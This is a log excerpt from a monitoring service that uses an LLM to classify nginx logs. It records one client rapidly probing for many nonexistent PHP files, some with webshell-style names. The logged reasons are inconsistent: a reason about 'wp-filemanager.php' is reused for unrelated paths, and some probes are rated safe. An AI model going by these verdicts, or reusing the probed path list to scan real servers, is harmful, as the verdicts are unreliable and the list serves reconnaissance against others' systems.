Mar 20 14:06:39 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:06:39.269978 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:59:01.927112245Z 4.204.200.32 - - [20/Mar/2026:13:59:01 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /edit.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:06:46 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:06:46.096492 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=safe confidence=0.65 action=allow pattern_type=prefix
Mar 20 14:06:46 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:06:46.096546 [analyzer] Confidence 0.65 too low for pattern learning (need 0.85+)
Mar 20 14:06:46 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:06:46.096634 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:59:01.994876805Z 4.204.200.32 - - [20/Mar/2026:13:59:01 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /t.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:06:54 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:06:54.728189 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.72 action=alert pattern_type=
Mar 20 14:06:54 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:06:54.728230 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=An nginx error indicating a missing file, which could indicate misconfiguration or probing but is not clearly malicious. Line=2026-03-20T13:59:02.063432370Z 2026/03/20 13:59:02 [error] 422#422: *750796 open() "/usr/share/nginx/default/file.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, request: ...
Mar 20 14:06:54 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:06:54.728308 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:59:02.063440161Z 4.204.200.32 - - [20/Mar/2026:13:59:02 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /file.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:06:54 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:06:54.728342 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:59:02.131144493Z 4.204.200.32 - - [20/Mar/2026:13:59:02 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /66.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:07:00 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:07:00.725783 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=safe confidence=0.65 action=allow pattern_type=prefix
Mar 20 14:07:00 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:07:00.725823 [analyzer] Confidence 0.65 too low for pattern learning (need 0.85+)
Mar 20 14:07:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:07:01.970267 [observer] Pipeline: processed=6085 pattern_hits=5698 llm_calls=387 llm_errors=3 learned=4
Mar 20 14:07:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:07:01.970303 [observer] Patterns: hash=5698 prefix=0 regex=0 contains=0 deny=68 alert=517 suppress=0 misses=387
Mar 20 14:07:07 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:07:07.478435 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.72 action=alert pattern_type=
Mar 20 14:07:07 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:07:07.478475 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Error indicates a request for a non-existent PHP file which could be probing for PHP files or misconfiguration leading to 404-like behavior; not clearly malicious but merits alerting. Line=2026-03-20T13:59:02.200890620Z 2026/03/20 13:59:02 [error] 422#422: *750796 open() "/usr/share/nginx/default/amax.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, request: ...
Mar 20 14:07:07 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:07:07.478559 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:59:02.200915016Z 4.204.200.32 - - [20/Mar/2026:13:59:02 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /amax.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:07:14 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:07:14.585302 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.72 action=alert pattern_type=
Mar 20 14:07:14 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:07:14.585343 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=An HTTP request resulted in a failed attempt to open a non-existent PHP file, which can indicate probing or misconfiguration. Not clearly malicious, but warrants attention. Line=2026-03-20T13:59:02.271348408Z 2026/03/20 13:59:02 [error] 422#422: *750796 open() "/usr/share/nginx/default/ioxi-o.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, request...
Mar 20 14:07:14 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:07:14.585411 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:59:02.271412100Z 4.204.200.32 - - [20/Mar/2026:13:59:02 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /ioxi-o.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:07:20 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:07:20.139951 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 14:07:20 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:07:20.139988 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=An access attempt to /admin/index.php resulted in a missing file error, which can indicate probing for admin interfaces. Line=2026-03-20T13:59:02.340524814Z 2026/03/20 13:59:02 [error] 422#422: *750796 open() "/usr/share/nginx/default/admin/index.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, re...
Mar 20 14:07:20 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:07:20.140053 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:59:02.340613372Z 4.204.200.32 - - [20/Mar/2026:13:59:02 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /admin/index.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:07:26 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:07:26.987870 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 14:07:26 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:07:26.987915 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=An error log showing a client requesting sid3.php which does not exist could indicate probing for vulnerable PHP files or misconfigured defaults. Not definitively malicious, but warrants alerting. Line=2026-03-20T13:59:02.409938098Z 2026/03/20 13:59:02 [error] 422#422: *750796 open() "/usr/share/nginx/default/sid3.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, request: ...
Mar 20 14:07:26 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:07:26.988283 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:59:02.410021934Z 4.204.200.32 - - [20/Mar/2026:13:59:02 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /sid3.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:07:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:07:31.937226 [observer] Pipeline: processed=6094 pattern_hits=5703 llm_calls=391 llm_errors=3 learned=4
Mar 20 14:07:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:07:31.937253 [observer] Patterns: hash=5703 prefix=0 regex=0 contains=0 deny=68 alert=521 suppress=0 misses=391
Mar 20 14:07:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:07:31.969428 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.72 action=alert pattern_type=
Mar 20 14:07:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:07:31.969468 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=An error log indicating attempt to open a PHP file that does not exist (potential probing for PHP files). Not definitive malicious, but warrants monitoring. Line=2026-03-20T13:59:02.481309245Z 2026/03/20 13:59:02 [error] 422#422: *750796 open() "/usr/share/nginx/default/d12.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, request: "...
Mar 20 14:07:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:07:31.969532 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:59:02.481476038Z 4.204.200.32 - - [20/Mar/2026:13:59:02 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /d12.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:07:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:07:31.969563 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:59:02.549401009Z 4.204.200.32 - - [20/Mar/2026:13:59:02 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /wp-blog.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:07:37 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:07:37.056318 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 14:07:37 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:07:37.056358 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to wp-blog.php and missing file suggests probing for WordPress vulnerability or misconfiguration; not definitive malware but warrants alert. Line=2026-03-20T13:59:02.549396201Z 2026/03/20 13:59:02 [error] 422#422: *750796 open() "/usr/share/nginx/default/wp-blog.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, reques...
Mar 20 14:07:41 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:07:41.412261 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 14:07:41 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:07:41.412302 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=An access attempt to a Wordpress core file (wp-blog-header.php) resulted in a missing file error, suggesting probing or misconfigured requests targeting Wordpress paths. Line=2026-03-20T13:59:02.618740289Z 2026/03/20 13:59:02 [error] 422#422: *750796 open() "/usr/share/nginx/default/wp-blog-header.php" failed (2: No such file or directory), client: 4.204.200.32, server: _,...
Mar 20 14:07:41 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:07:41.412380 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:59:02.618760578Z 4.204.200.32 - - [20/Mar/2026:13:59:02 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /wp-blog-header.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:07:46 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:07:46.040257 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 14:07:46 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:07:46.040295 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Error opening a file under /usr/share/nginx/default when handling a request for /abc.php could indicate a missing file or an unexpected access attempt Line=2026-03-20T13:59:02.692672208Z 2026/03/20 13:59:02 [error] 422#422: *750796 open() "/usr/share/nginx/default/abc.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, request: "...
Mar 20 14:07:46 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:07:46.040356 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:59:02.692690612Z 4.204.200.32 - - [20/Mar/2026:13:59:02 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /abc.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:07:52 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:07:52.278576 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 14:07:52 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:07:52.278615 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=NGINX error log showing a missing file open() for a PHP file suggests a potential probe or misconfiguration; not definitive malicious activity but warrants attention. Line=2026-03-20T13:59:02.773461816Z 2026/03/20 13:59:02 [error] 422#422: *750796 open() "/usr/share/nginx/default/55b76.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, request:...
Mar 20 14:07:52 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:07:52.278677 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:59:02.773477808Z 4.204.200.32 - - [20/Mar/2026:13:59:02 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /55b76.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:07:56 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:07:56.393590 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 14:07:56 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:07:56.393631 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Attempt to access a PHP admin footer file that does not exist; could indicate probing for sensitive files or misconfiguration. Line=2026-03-20T13:59:02.841596605Z 2026/03/20 13:59:02 [error] 422#422: *750796 open() "/usr/share/nginx/default/admin-footer.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, r...
Mar 20 14:07:56 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:07:56.393702 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:59:02.841607781Z 4.204.200.32 - - [20/Mar/2026:13:59:02 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /admin-footer.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:08:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:08:01.953036 [observer] Pipeline: processed=6106 pattern_hits=5709 llm_calls=397 llm_errors=3 learned=4
Mar 20 14:08:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:08:01.953061 [observer] Patterns: hash=5709 prefix=0 regex=0 contains=0 deny=68 alert=527 suppress=0 misses=397
Mar 20 14:08:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:08:02.730943 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 14:08:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:08:02.731646 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=A request for wp-good.php with an open() failure suggests probing for a WordPress file, which could indicate vulnerability scanning against the web server. Line=2026-03-20T13:59:02.909688967Z 2026/03/20 13:59:02 [error] 422#422: *750796 open() "/usr/share/nginx/default/wp-good.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, reques...
Mar 20 14:08:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:08:02.731724 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:59:02.910647670Z 4.204.200.32 - - [20/Mar/2026:13:59:02 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /wp-good.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:08:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:08:08.122058 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 14:08:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:08:08.122096 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=An error referencing a non-existent PHP file (ccs.php) in an HTTP request could indicate an attempted access to a potentially sensitive resource or a probe for vulnerable PHP files. Line=2026-03-20T13:59:02.978320629Z 2026/03/20 13:59:02 [error] 422#422: *750796 open() "/usr/share/nginx/default/ccs.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, request: "...
Mar 20 14:08:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:08:08.122178 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:59:02.978397993Z 4.204.200.32 - - [20/Mar/2026:13:59:02 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /ccs.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:08:14 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:08:14.062301 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 14:08:14 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:08:14.062338 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Nginx open() failed for a PHP file that does not exist, indicating a possible probe for PHP files or webshells. Line=2026-03-20T13:59:03.048209305Z 2026/03/20 13:59:03 [error] 422#422: *750796 open() "/usr/share/nginx/default/ws83.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, request: ...
Mar 20 14:08:14 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:08:14.062402 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:59:03.048241055Z 4.204.200.32 - - [20/Mar/2026:13:59:03 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /ws83.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:08:20 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:08:20.923412 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 14:08:20 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:08:20.923451 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Error log shows an attempt to access inputs.php with missing file, which can indicate probing or misconfigured routing; not clearly malicious but warrants attention. Line=2026-03-20T13:59:03.122559873Z 2026/03/20 13:59:03 [error] 422#422: *750796 open() "/usr/share/nginx/default/inputs.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, request...
Mar 20 14:08:20 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:08:20.923515 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:59:03.122590839Z 4.204.200.32 - - [20/Mar/2026:13:59:03 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /inputs.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:08:26 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:08:26.749668 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 14:08:26 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:08:26.749709 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=External request to a PHP file that does not exist; indicative of probing for vulnerable scripts or misconfigured paths. Line=2026-03-20T13:59:03.190806504Z 2026/03/20 13:59:03 [error] 422#422: *750796 open() "/usr/share/nginx/default/drhunthq.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, reque...
Mar 20 14:08:26 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:08:26.749774 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:59:03.190822212Z 4.204.200.32 - - [20/Mar/2026:13:59:03 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /drhunthq.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:08:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:08:31.942460 [observer] Pipeline: processed=6116 pattern_hits=5714 llm_calls=402 llm_errors=3 learned=4
Mar 20 14:08:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:08:31.942487 [observer] Patterns: hash=5714 prefix=0 regex=0 contains=0 deny=68 alert=532 suppress=0 misses=402
Mar 20 14:08:35 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:08:35.310259 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 14:08:35 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:08:35.310306 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404-like open() failure for a PHP file suggests probing for vulnerable or misconfigured PHP files; could indicate an attacker attempting to access webroot files. Line=2026-03-20T13:59:03.259068387Z 2026/03/20 13:59:03 [error] 422#422: *750796 open() "/usr/share/nginx/default/a5e0a.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, request:...
Mar 20 14:08:35 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:08:35.310404 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:59:03.259071202Z 4.204.200.32 - - [20/Mar/2026:13:59:03 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /a5e0a.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:08:40 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:08:40.667557 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 14:08:40 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:08:40.667600 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to a PHP file (lib.php) that does not exist may indicate probing for vulnerable endpoints or misconfigured app files. Line=2026-03-20T13:59:03.326822448Z 2026/03/20 13:59:03 [error] 422#422: *750796 open() "/usr/share/nginx/default/lib.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, request: "...
Mar 20 14:08:40 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:08:40.667666 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:59:03.326839716Z 4.204.200.32 - - [20/Mar/2026:13:59:03 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /lib.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:08:47 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:08:47.699462 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 14:08:47 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:08:47.699501 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Nginx error shows an open() failed for a PHP file under default site, which can indicate probing for accessible PHP files or misconfigurations. Not clearly malicious by itself, but warrants attention. Line=2026-03-20T13:59:03.394779236Z 2026/03/20 13:59:03 [error] 422#422: *750796 open() "/usr/share/nginx/default/gfd.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, request: "...
Mar 20 14:08:47 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:08:47.699564 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:59:03.394799584Z 4.204.200.32 - - [20/Mar/2026:13:59:03 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /gfd.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:08:53 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:08:53.103465 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 14:08:53 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:08:53.103504 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=A request for a PHP file ws81.php resulted in a file-not-found error, which may indicate probing for vulnerable PHP assets. Line=2026-03-20T13:59:03.468658061Z 2026/03/20 13:59:03 [error] 422#422: *750796 open() "/usr/share/nginx/default/ws81.php" failed (2: No such file or directory), client: 4.204.200.32, server: _, request: ...
Mar 20 14:08:53 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:08:53.103566 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:59:03.468864103Z 4.204.200.32 - - [20/Mar/2026:13:59:03 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /ws81.php HTTP/1.1" 404 2401 "-" "-" "-"
Mar 20 14:08:53 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:08:53.103597 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors. Line=2026-03-20T13:59:03.536476758Z 4.204.200.32 - - [20/Mar/2026:13:59:03 +0000] "ec2-54-200-221-0.us-west-2.compute.amazonaws.com" "GET /domains.php HTTP/1.1" 404 2401 "-" "-" "-"
